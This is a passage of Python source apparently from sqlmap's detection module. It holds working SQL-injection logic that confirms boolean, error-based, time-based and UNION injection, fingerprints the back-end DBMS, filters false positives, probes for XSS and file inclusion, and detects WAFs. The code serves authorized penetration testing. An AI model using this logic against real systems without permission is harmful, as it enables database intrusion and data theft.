' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:\n                                                    suggestion = conf.string = candidate\n                                                    injectable = True\n\n                                                    infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.string).lstrip('u').strip(\"'\"))\n                                                    logger.info(infoMsg)\n\n                                                    break\n\n                            if injectable:\n                                if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n                                    if all((falseCode, trueCode)) and falseCode != trueCode:\n                                        suggestion = conf.code = trueCode\n\n                                        infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --code=%d)\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, conf.code)\n                                        logger.info(infoMsg)\n                                    else:\n                                        trueSet = set(extractTextTagContent(trueRawResponse))\n                                        trueSet |= set(__ for _ in trueSet for __ in _.split())\n\n                                        falseSet = set(extractTextTagContent(falseRawResponse))\n                                        falseSet |= set(__ for _ in falseSet for __ in _.split())\n\n                                        if threadData.lastErrorPage and threadData.lastErrorPage[1]:\n                                            errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))\n                                            errorSet |= set(__ for _ in errorSet for __ in _.split())\n                                        else:\n                                            errorSet = set()\n\n                                        candidates = filterNone(_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet))\n\n                                        if candidates:\n                                            candidates = sorted(candidates, key=len)\n                                            for candidate in candidates:\n                                                if re.match(r\"\\A\\w{2,}\\Z\", candidate):  # Note: length of 1 (e.g. --string=5) could cause trouble, especially in error message pages with partially reflected payload content\n                                                    break\n\n                                            suggestion = conf.string = candidate\n\n                                            infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.string).lstrip('u').strip(\"'\"))\n                                            logger.info(infoMsg)\n\n                                        if not any((conf.string, conf.notString)):\n                                            candidates = filterNone(_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet))\n\n                                            if candidates:\n                                                candidates = sorted(candidates, key=len)\n                                                for candidate in candidates:\n                                                    if re.match(r\"\\A\\w+\\Z\", candidate):\n                                                        break\n\n                                                suggestion = conf.notString = candidate\n\n                                                infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --not-string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.notString).lstrip('u').strip(\"'\"))\n                                                logger.info(infoMsg)\n\n                                if not suggestion:\n                                    infoMsg = \"%sparameter '%s' appears to be '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n                                    singleTimeLogMessage(infoMsg)\n\n                        # In case of error-based SQL injection\n                        elif method == PAYLOAD.METHOD.GREP:\n                            # Perform the test's request and grep the response\n                            # body for the test's <grep> regular expression\n                            try:\n                                page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)\n                                output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)\n                                output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)\n                                output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)\n                                output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)\n\n                                if output:\n                                    result = output == '1'\n\n                                    if result:\n                                        infoMsg = \"%sparameter '%s' is '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n                                        logger.info(infoMsg)\n\n                                        injectable = True\n\n                            except SqlmapConnectionException as ex:\n                                debugMsg = \"problem occurred most likely because the \"\n                                debugMsg += \"server hasn't recovered as expected from the \"\n                                debugMsg += \"used error-based payload ('%s')\" % getSafeExString(ex)\n                                logger.debug(debugMsg)\n\n                        # In case of time-based blind or stacked queries\n                        # SQL injections\n                        elif method == PAYLOAD.METHOD.TIME:\n                            # Perform the test's request\n                            trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)\n                            trueCode = threadData.lastCode\n\n                            if trueResult:\n                                # Extra validation step (e.g. to check for DROP protection mechanisms)\n                                if SLEEP_TIME_MARKER in reqPayload:\n                                    falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, \"0\"), place, timeBasedCompare=True, raise404=False)\n                                    if falseResult:\n                                        continue\n\n                                # Confirm test's results\n                                trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)\n\n                                if trueResult:\n                                    infoMsg = \"%sparameter '%s' appears to be '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n                                    logger.info(infoMsg)\n\n                                    injectable = True\n\n                        # In case of UNION query SQL injection\n                        elif method == PAYLOAD.METHOD.UNION:\n                            # Test for UNION injection and set the sample\n                            # payload as well as the vector.\n                            # NOTE: vector is set to a tuple with 6 elements,\n                            # used afterwards by Agent.forgeUnionQuery()\n                            # method to forge the UNION query payload\n\n                            configUnion(test.request.char, test.request.columns)\n\n                            if len(kb.dbmsFilter or []) == 1:\n                                Backend.forceDbms(kb.dbmsFilter[0])\n                            elif not Backend.getIdentifiedDbms():\n                                if kb.heuristicDbms is None:\n                                    if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:\n                                        warnMsg = \"using unescaped version of the test \"\n                                        warnMsg += \"because of zero knowledge of the \"\n                                        warnMsg += \"back-end DBMS. You can try to \"\n                                        warnMsg += \"explicitly set it with option '--dbms'\"\n                                        singleTimeWarnMessage(warnMsg)\n                                else:\n                                    Backend.forceDbms(kb.heuristicDbms)\n\n                            if unionExtended:\n                                infoMsg = \"automatically extending ranges for UNION \"\n                                infoMsg += \"query injection technique tests as \"\n                                infoMsg += \"there is at least one other (potential) \"\n                                infoMsg += \"technique found\"\n                                singleTimeLogMessage(infoMsg)\n\n                            # Test for UNION query SQL injection\n                            reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)\n\n                            if isinstance(reqPayload, six.string_types):\n                                infoMsg = \"%sparameter '%s' is '%s' injectable\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n                                logger.info(infoMsg)\n\n                                injectable = True\n\n                                # Overwrite 'where' because it can be set\n                                # by unionTest() directly\n                                where = vector[6]\n\n                        kb.previousMethod = method\n\n                        if conf.offline:\n                            injectable = False\n\n                    # If the injection test was successful feed the injection\n                    # object with the test's details\n                    if injectable is True:\n                        # Feed with the boundaries details only the first time a\n                        # test has been successful\n                        if injection.place is None or injection.parameter is None:\n                            if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):\n                                injection.parameter = place\n                            else:\n                                injection.parameter = parameter\n\n                            injection.place = place\n                            injection.ptype = ptype\n                            injection.prefix = prefix\n                            injection.suffix = suffix\n                            injection.clause = clause\n\n                        # Feed with test details every time a test is successful\n                        if hasattr(test, \"details\"):\n                            for key, value in test.details.items():\n                                if key == \"dbms\":\n                                    injection.dbms = value\n\n                                    if not isinstance(value, list):\n                                        Backend.setDbms(value)\n                                    else:\n                                        Backend.forceDbms(value[0], True)\n\n                                elif key == \"dbms_version\" and injection.dbms_version is None and not conf.testFilter:\n                                    injection.dbms_version = Backend.setVersion(value)\n\n                                elif key == \"os\" and injection.os is None:\n                                    injection.os = Backend.setOs(value)\n\n                        if vector is None and \"vector\" in test and test.vector is not None:\n                            vector = test.vector\n\n                        injection.data[stype] = AttribDict()\n                        injection.data[stype].title = title\n                        injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)\n                        injection.data[stype].where = where\n                        injection.data[stype].vector = vector\n                        injection.data[stype].comment = comment\n                        injection.data[stype].templatePayload = templatePayload\n                        injection.data[stype].matchRatio = kb.matchRatio\n                        injection.data[stype].trueCode = trueCode\n                        injection.data[stype].falseCode = falseCode\n\n                        injection.conf.textOnly = conf.textOnly\n                        injection.conf.titles = conf.titles\n                        injection.conf.code = conf.code\n                        injection.conf.string = conf.string\n                        injection.conf.notString = conf.notString\n                        injection.conf.regexp = conf.regexp\n                        injection.conf.optimize = conf.optimize\n\n                        if not kb.alerted:\n                            if conf.beep:\n                                beep()\n\n                            if conf.alert:\n                                infoMsg = \"executing alerting shell command(s) ('%s')\" % conf.alert\n                                logger.info(infoMsg)\n\n                                try:\n                                    process = subprocess.Popen(conf.alert, shell=True)\n                                    process.wait()\n                                except Exception as ex:\n                                    errMsg = \"error occurred while executing '%s' ('%s')\" % (conf.alert, getSafeExString(ex))\n                                    logger.error(errMsg)\n\n                            kb.alerted = True\n\n                        # There is no need to perform this test for other\n                        # <where> tags\n                        break\n\n                if injectable is True:\n                    kb.vulnHosts.add(conf.hostname)\n                    break\n\n            # Reset forced back-end DBMS value\n            Backend.flushForcedDbms()\n\n        except KeyboardInterrupt:\n            warnMsg = \"user aborted during detection phase\"\n            logger.warning(warnMsg)\n\n            if conf.multipleTargets:\n                msg = \"how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]\"\n                choice = readInput(msg, default='X', checkBatch=False).upper()\n            else:\n                msg = \"how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]\"\n                choice = readInput(msg, default='S', checkBatch=False).upper()\n\n            if choice == 'X':\n                if conf.multipleTargets:\n                    raise SqlmapSkipTargetException\n            elif choice == 'C':\n                choice = None\n                while not ((choice or \"\").isdigit() and 0 <= int(choice) <= 6):\n                    if choice:\n                        logger.warning(\"invalid value\")\n                    msg = \"enter new verbosity level: [0-6] \"\n                    choice = readInput(msg, default=str(conf.verbose), checkBatch=False)\n                conf.verbose = int(choice)\n                setVerbosity()\n                tests.insert(0, test)\n            elif choice == 'N':\n                return None\n            elif choice == 'E':\n                kb.endDetection = True\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n\n        finally:\n            # Reset forced back-end DBMS value\n            Backend.flushForcedDbms()\n\n    Backend.flushForcedDbms(True)\n\n    # Return the injection object\n    if injection.place is not None and injection.parameter is not None:\n        if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):\n            warnMsg = \"in OR boolean-based injection cases, please consider usage \"\n            warnMsg += \"of switch '--drop-set-cookie' if you experience any \"\n            warnMsg += \"problems during data retrieval\"\n            logger.warning(warnMsg)\n\n        if not checkFalsePositives(injection):\n            if conf.hostname in kb.vulnHosts:\n                kb.vulnHosts.remove(conf.hostname)\n\n            if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:\n                injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)\n\n    else:\n        injection = None\n\n    if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:\n        checkSuhosinPatch(injection)\n        checkFilteredChars(injection)\n\n    return injection\n\n@stackedmethod\ndef heuristicCheckDbms(injection):\n    \"\"\"\n    This functions is called when boolean-based blind is identified with a\n    generic payload and the DBMS has not yet been fingerprinted to attempt\n    to identify with a simple DBMS specific boolean-based test what the DBMS\n    may be\n    \"\"\"\n\n    retVal = False\n\n    if conf.skipHeuristics:\n        return retVal\n\n    pushValue(kb.injection)\n    kb.injection = injection\n\n    for dbms in getPublicTypeMembers(DBMS, True):\n        randStr1, randStr2 = randomStr(), randomStr()\n\n        Backend.forceDbms(dbms)\n\n        if dbms in HEURISTIC_NULL_EVAL:\n            result = checkBooleanExpression(\"(SELECT %s%s) IS NULL\" % (HEURISTIC_NULL_EVAL[dbms], FROM_DUMMY_TABLE.get(dbms, \"\")))\n        elif not ((randStr1 in unescaper.escape(\"'%s'\" % randStr1)) and list(FROM_DUMMY_TABLE.values()).count(FROM_DUMMY_TABLE.get(dbms, \"\")) != 1):\n            result = checkBooleanExpression(\"(SELECT '%s'%s)=%s%s%s\" % (randStr1, FROM_DUMMY_TABLE.get(dbms, \"\"), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER))\n        else:\n            result = False\n\n        if result:\n            if not checkBooleanExpression(\"(SELECT '%s'%s)=%s%s%s\" % (randStr1, FROM_DUMMY_TABLE.get(dbms, \"\"), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):\n                retVal = dbms\n                break\n\n    Backend.flushForcedDbms()\n    kb.injection = popValue()\n\n    if retVal:\n        infoMsg = \"heuristic (extended) test shows that the back-end DBMS \"  # Not as important as \"parsing\" counter-part (because of false-positives)\n        infoMsg += \"could be '%s' \" % retVal\n        logger.info(infoMsg)\n\n        kb.heuristicExtendedDbms = retVal\n\n    return retVal\n\n@stackedmethod\ndef checkFalsePositives(injection):\n    \"\"\"\n    Checks for false positives (only in single special cases)\n    \"\"\"\n\n    retVal = True\n\n    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and \"Generic\" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):\n        pushValue(kb.injection)\n\n        infoMsg = \"checking if the injection point on %s \" % injection.place\n        infoMsg += \"parameter '%s' is a false positive\" % injection.parameter\n        logger.info(infoMsg)\n\n        def _():\n            return int(randomInt(2)) + 1\n\n        kb.injection = injection\n\n        for level in xrange(conf.level):\n            while True:\n                randInt1, randInt2, randInt3 = (_() for j in xrange(3))\n\n                randInt1 = min(randInt1, randInt2, randInt3)\n                randInt3 = max(randInt1, randInt2, randInt3)\n\n                if conf.string and any(conf.string in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):\n                    continue\n\n                if conf.notString and any(conf.notString in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):\n                    continue\n\n                if randInt3 > randInt2 > randInt1:\n                    break\n\n            if not checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt1)):\n                retVal = False\n                break\n\n            if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:\n                checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt2))          # just in case if DBMS hasn't properly recovered from previous delayed request\n\n            if checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt3)):          # this must not be evaluated to True\n                retVal = False\n                break\n\n            elif checkBooleanExpression(\"%d%s%d\" % (randInt3, INFERENCE_EQUALS_CHAR, randInt2)):        # this must not be evaluated to True\n                retVal = False\n                break\n\n            elif not checkBooleanExpression(\"%d%s%d\" % (randInt2, INFERENCE_EQUALS_CHAR, randInt2)):    # this must be evaluated to True\n                retVal = False\n                break\n\n            elif checkBooleanExpression(\"%d %d\" % (randInt3, randInt2)):                                # this must not be evaluated to True (invalid statement)\n                retVal = False\n                break\n\n        if not retVal:\n            warnMsg = \"false positive or unexploitable injection point detected\"\n            logger.warning(warnMsg)\n\n        kb.injection = popValue()\n\n    return retVal\n\n@stackedmethod\ndef checkSuhosinPatch(injection):\n    \"\"\"\n    Checks for existence of Suhosin-patch (and alike) protection mechanism(s)\n    \"\"\"\n\n    if injection.place in (PLACE.GET, PLACE.URI):\n        debugMsg = \"checking for parameter length \"\n        debugMsg += \"constraining mechanisms\"\n        logger.debug(debugMsg)\n\n        pushValue(kb.injection)\n\n        kb.injection = injection\n        randInt = randomInt()\n\n        if not checkBooleanExpression(\"%d=%s%d\" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):\n            warnMsg = \"parameter length constraining \"\n            warnMsg += \"mechanism detected (e.g. Suhosin patch). \"\n            warnMsg += \"Potential problems in enumeration phase can be expected\"\n            logger.warning(warnMsg)\n\n        kb.injection = popValue()\n\n@stackedmethod\ndef checkFilteredChars(injection):\n    debugMsg = \"checking for filtered characters\"\n    logger.debug(debugMsg)\n\n    pushValue(kb.injection)\n\n    kb.injection = injection\n    randInt = randomInt()\n\n    # all other techniques are already using parentheses in tests\n    if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:\n        if not checkBooleanExpression(\"(%d)=%d\" % (randInt, randInt)):\n            warnMsg = \"it appears that some non-alphanumeric characters (i.e. ()) are \"\n            warnMsg += \"filtered by the back-end server. There is a strong \"\n            warnMsg += \"possibility that sqlmap won't be able to properly \"\n            warnMsg += \"exploit this vulnerability\"\n            logger.warning(warnMsg)\n\n    # inference techniques depend on character '>'\n    if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):\n        if not checkBooleanExpression(\"%d>%d\" % (randInt + 1, randInt)):\n            warnMsg = \"it appears that the character '>' is \"\n            warnMsg += \"filtered by the back-end server. You are strongly \"\n            warnMsg += \"advised to rerun with the '--tamper=between'\"\n            logger.warning(warnMsg)\n\n    kb.injection = popValue()\n\ndef heuristicCheckSqlInjection(place, parameter):\n    if conf.skipHeuristics:\n        return None\n\n    origValue = conf.paramDict[place][parameter]\n    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n    prefix = \"\"\n    suffix = \"\"\n    randStr = \"\"\n\n    if conf.prefix or conf.suffix:\n        if conf.prefix:\n            prefix = conf.prefix\n\n        if conf.suffix:\n            suffix = conf.suffix\n\n    while randStr.count('\\'') != 1 or randStr.count('\\\"') != 1:\n        randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)\n\n    kb.heuristicMode = True\n\n    payload = \"%s%s%s\" % (prefix, randStr, suffix)\n    payload = agent.payload(place, parameter, newValue=payload)\n    page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n\n    kb.heuristicPage = page\n    kb.heuristicMode = False\n\n    parseFilePaths(page)\n    result = wasLastResponseDBMSError()\n\n    infoMsg = \"heuristic (basic) test shows that %sparameter '%s' might \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n\n    def _(page):\n        return any(_ in (page or \"\") for _ in FORMAT_EXCEPTION_STRINGS)\n\n    casting = _(page) and not _(kb.originalPage)\n\n    if not casting and not result and kb.dynamicParameter and origValue.isdigit() and not kb.heavilyDynamic:\n        randInt = int(randomInt())\n        payload = \"%s%s%s\" % (prefix, \"%d-%d\" % (int(origValue) + randInt, randInt), suffix)\n        payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)\n        result = Request.queryPage(payload, place, raise404=False)\n\n        if not result:\n            randStr = randomStr()\n            payload = \"%s%s%s\" % (prefix, \"%s.%d%s\" % (origValue, random.randint(1, 9), randStr), suffix)\n            payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)\n            casting = Request.queryPage(payload, place, raise404=False)\n\n    kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE\n\n    if kb.heavilyDynamic:\n        debugMsg = \"heuristic check stopped because of heavy dynamicity\"\n        logger.debug(debugMsg)\n        return kb.heuristicTest\n\n    if casting:\n        errMsg = \"possible %s casting detected (e.g. '\" % (\"integer\" if origValue.isdigit() else \"type\")\n\n        platform = conf.url.split('.')[-1].lower()\n        if platform == WEB_PLATFORM.ASP:\n            errMsg += \"%s=CInt(request.querystring(\\\"%s\\\"))\" % (parameter, parameter)\n        elif platform == WEB_PLATFORM.ASPX:\n            errMsg += \"int.TryParse(Request.QueryString[\\\"%s\\\"], out %s)\" % (parameter, parameter)\n        elif platform == WEB_PLATFORM.JSP:\n            errMsg += \"%s=Integer.parseInt(request.getParameter(\\\"%s\\\"))\" % (parameter, parameter)\n        else:\n            errMsg += \"$%s=intval($_REQUEST[\\\"%s\\\"])\" % (parameter, parameter)\n\n        errMsg += \"') at the back-end web application\"\n        logger.error(errMsg)\n\n        if kb.ignoreCasted is None:\n            message = \"do you want to skip those kind of cases (and save scanning time)? %s \" % (\"[Y/n]\" if conf.multipleTargets else \"[y/N]\")\n            kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True)\n\n    elif result:\n        infoMsg += \"be injectable\"\n        if Backend.getErrorParsedDBMSes():\n            infoMsg += \" (possible DBMS: '%s')\" % Format.getErrorParsedDBMSes()\n        logger.info(infoMsg)\n\n    else:\n        infoMsg += \"not be injectable\"\n        logger.warning(infoMsg)\n\n    kb.heuristicMode = True\n    kb.disableHtmlDecoding = True\n\n    randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)\n    value = \"%s%s%s\" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)\n    payload = \"%s%s%s\" % (prefix, \"'%s\" % value, suffix)\n    payload = agent.payload(place, parameter, newValue=payload)\n    page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n\n    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n    # Reference: https://bugs.python.org/issue18183\n    if value.upper() in (page or \"\").upper():\n        infoMsg = \"heuristic (XSS) test shows that %sparameter '%s' might be vulnerable to cross-site scripting (XSS) attacks\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n        logger.info(infoMsg)\n\n        if conf.beep:\n            beep()\n\n    for match in re.finditer(FI_ERROR_REGEX, page or \"\"):\n        if randStr1.lower() in match.group(0).lower():\n            infoMsg = \"heuristic (FI) test shows that %sparameter '%s' might be vulnerable to file inclusion (FI) attacks\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n            logger.info(infoMsg)\n\n            if conf.beep:\n                beep()\n\n            break\n\n    kb.disableHtmlDecoding = False\n    kb.heuristicMode = False\n\n    return kb.heuristicTest\n\ndef checkDynParam(place, parameter, value):\n    \"\"\"\n    This function checks if the URL parameter is dynamic. If it is\n    dynamic, the content of the page differs, otherwise the\n    dynamicity might depend on another parameter.\n    \"\"\"\n\n    if kb.choices.redirect:\n        return None\n\n    kb.matchRatio = None\n    dynResult = None\n    randInt = randomInt()\n\n    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n    infoMsg = \"testing if %sparameter '%s' is dynamic\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n    logger.info(infoMsg)\n\n    try:\n        payload = agent.payload(place, parameter, value, getUnicode(randInt))\n        dynResult = Request.queryPage(payload, place, raise404=False)\n    except SqlmapConnectionException:\n        pass\n\n    result = None if dynResult is None else not dynResult\n    kb.dynamicParameter = result\n\n    return result\n\ndef checkDynamicContent(firstPage, secondPage):\n    \"\"\"\n    This function checks for the dynamic content in the provided pages\n    \"\"\"\n\n    if kb.nullConnection:\n        debugMsg = \"dynamic content checking skipped \"\n        debugMsg += \"because NULL connection used\"\n        logger.debug(debugMsg)\n        return\n\n    if any(page is None for page in (firstPage, secondPage)):\n        warnMsg = \"can't check dynamic content \"\n        warnMsg += \"because of lack of page content\"\n        logger.critical(warnMsg)\n        return\n\n    if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)):\n        ratio = None\n    else:\n        try:\n            seqMatcher = getCurrentThreadData().seqMatcher\n            seqMatcher.set_seq1(firstPage)\n            seqMatcher.set_seq2(secondPage)\n            ratio = seqMatcher.quick_ratio()\n        except MemoryError:\n            ratio = None\n\n    if ratio is None:\n        kb.skipSeqMatcher = True\n\n    # In case of an intolerable difference turn on dynamicity removal engine\n    elif ratio <= UPPER_RATIO_BOUND:\n        findDynamicContent(firstPage, secondPage)\n\n        count = 0\n        while not Request.queryPage():\n            count += 1\n\n            if count > conf.retries:\n                warnMsg = \"target URL content appears to be too dynamic. \"\n                warnMsg += \"Switching to '--text-only' \"\n                logger.warning(warnMsg)\n\n                conf.textOnly = True\n                return\n\n            warnMsg = \"target URL content appears to be heavily dynamic. \"\n            warnMsg += \"sqlmap is going to retry the request(s)\"\n            singleTimeLogMessage(warnMsg, logging.CRITICAL)\n\n            kb.heavilyDynamic = True\n\n            secondPage, _, _ = Request.queryPage(content=True)\n            findDynamicContent(firstPage, secondPage)\n\ndef checkStability():\n    \"\"\"\n    This function checks if the URL content is stable requesting the\n    same page two times with a small delay within each request to\n    assume that it is stable.\n\n    In case the content of the page differs when requesting\n    the same page, the dynamicity might depend on other parameters,\n    like for instance string matching (--string).\n    \"\"\"\n\n    infoMsg = \"testing if the target URL content is stable\"\n    logger.info(infoMsg)\n\n    firstPage = kb.originalPage  # set inside checkConnection()\n\n    delay = MAX_STABILITY_DELAY - (time.time() - (kb.originalPageTime or 0))\n    delay = max(0, min(MAX_STABILITY_DELAY, delay))\n    time.sleep(delay)\n\n    secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)\n\n    if kb.choices.redirect:\n        return None\n\n    kb.pageStable = (firstPage == secondPage)\n\n    if kb.pageStable:\n        if firstPage:\n            infoMsg = \"target URL content is stable\"\n            logger.info(infoMsg)\n        else:\n            errMsg = \"there was an error checking the stability of page \"\n            errMsg += \"because of lack of content. Please check the \"\n            errMsg += \"page request results (and probable errors) by \"\n            errMsg += \"using higher verbosity levels\"\n            logger.error(errMsg)\n\n    else:\n        warnMsg = \"target URL content is not stable (i.e. content differs). sqlmap will base the page \"\n        warnMsg += \"comparison on a sequence matcher. If no dynamic nor \"\n        warnMsg += \"injectable parameters are detected, or in case of \"\n        warnMsg += \"junk results, refer to user's manual paragraph \"\n        warnMsg += \"'Page comparison'\"\n        logger.warning(warnMsg)\n\n        message = \"how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] \"\n        choice = readInput(message, default='C').upper()\n\n        if choice == 'Q':\n            raise SqlmapUserQuitException\n\n        elif choice == 'S':\n            showStaticWords(firstPage, secondPage)\n\n            message = \"please enter value for parameter 'string': \"\n            string = readInput(message)\n\n            if string:\n                conf.string = string\n\n                if kb.nullConnection:\n                    debugMsg = \"turning off NULL connection \"\n                    debugMsg += \"support because of string checking\"\n                    logger.debug(debugMsg)\n\n                    kb.nullConnection = None\n            else:\n                errMsg = \"Empty value supplied\"\n                raise SqlmapNoneDataException(errMsg)\n\n        elif choice == 'R':\n            message = \"please enter value for parameter 'regex': \"\n            regex = readInput(message)\n\n            if regex:\n                conf.regex = regex\n\n                if kb.nullConnection:\n                    debugMsg = \"turning off NULL connection \"\n                    debugMsg += \"support because of regex checking\"\n                    logger.debug(debugMsg)\n\n                    kb.nullConnection = None\n            else:\n                errMsg = \"Empty value supplied\"\n                raise SqlmapNoneDataException(errMsg)\n\n        else:\n            checkDynamicContent(firstPage, secondPage)\n\n    return kb.pageStable\n\n@stackedmethod\ndef checkWaf():\n    \"\"\"\n    Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse\n    \"\"\"\n\n    if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):\n        return None\n\n    if kb.originalCode == _http_client.NOT_FOUND:\n        return None\n\n    _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)\n    if _ is not None:\n        if _:\n            warnMsg = \"previous heuristics detected that the target \"\n            warnMsg += \"is protected by some kind of WAF/IPS\"\n            logger.critical(warnMsg)\n        return _\n\n    if not kb.originalPage:\n        return None\n\n    infoMsg = \"checking if the target is protected by \"\n    infoMsg += \"some kind of WAF/IPS\"\n    logger.info(infoMsg)\n\n    retVal = False\n    payload = \"%d %s\" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)\n\n    place = PLACE.GET\n    if PLACE.URI in conf.parameters:\n        value = \"%s=%s\" % (randomStr(), agent.addPayloadDelimiters(payload))\n    else:\n        value = \"\" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER\n        value += \"%s=%s\" % (randomStr(), agent.addPayloadDelimiters(payload))\n\n    pushValue(kb.choices.redirect)\n    pushValue(kb.resendPostOnRedirect)\n    pushValue(conf.timeout)\n\n    kb.choices.redirect = REDIRECTION.YES\n    kb.resendPostOnRedirect = False\n    conf.timeout = IPS_WAF_CHECK_TIMEOUT\n\n    try:\n        retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO\n    except SqlmapConnectionException:\n        retVal = True\n    finally:\n        kb.matchRatio = None\n\n        conf.timeout = popValue()\n        kb.resendPostOnRedirect = popValue()\n        kb.choices.redirect = popValue()\n\n    hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True)\n\n    if retVal:\n        if not kb.identifiedWafs:\n            warnMsg = \"heuristics detected that the target \"\n            warnMsg += \"is protected by some kind of WAF/IPS\"\n            logger.critical(warnMsg)\n\n        message = \"are you sure that you want to \"\n        message += \"continue with further target testing? [Y/n] \"\n        choice = readInput(message, default='Y', boolean=True)\n\n        if not choice:\n            raise SqlmapUserQuitException\n        else:\n            if not conf.tamper:\n                warnMsg = \"please consider usage of tamper scripts (option '--tamper')\"\n                singleTimeWarnMessage(warnMsg)\n\n    return retVal\n\n@stackedmethod\ndef checkNullConnection():\n    \"\"\"\n    Reference: http://www.wisec.it/sectou.php?id=472f952d79293\n    \"\"\"\n\n    if conf.data:\n        return False\n\n    _ = 